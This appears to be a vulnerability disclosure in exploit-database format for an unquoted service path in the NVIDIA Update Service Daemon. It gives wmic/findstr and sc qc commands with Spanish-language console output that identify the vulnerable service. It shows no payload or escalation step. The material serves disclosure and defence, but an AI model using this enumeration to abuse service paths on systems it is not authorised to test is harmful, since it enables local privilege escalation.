Nvidia GeForce version 11.0.1.163 suffers from an unquoted service path vulnerability.
f899342e79088e5e909435b982381694ddaed2c99c3ce95c2d35461b1b8d089e
# Exploit Title: Nvidia GeForce v11.0.1.163 - Unquoted Service Path
# Date: 2024-11-25
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# t.me/Ci3c0
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://www.nvidia.com/es-la/
# Software Link: https://www.nvidia.com/es-la/
# Version: 11.0.1.163
# Tested on: Windows 10 Pro x64 Esp
C:\>wmic service get name, pathname, displayname, startmode | findstr
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v
"""
NVIDIA Update Service Daemon
nvUpdatusService C:\Program Files
(x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
Auto
C:\>sc qc nvUpdatusService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: nvUpdatusService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START (DELAYED)
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA
Corporation\NVIDIA Updatus\daemonu.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : NVIDIA Update Service Daemon
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: .\UpdatusUser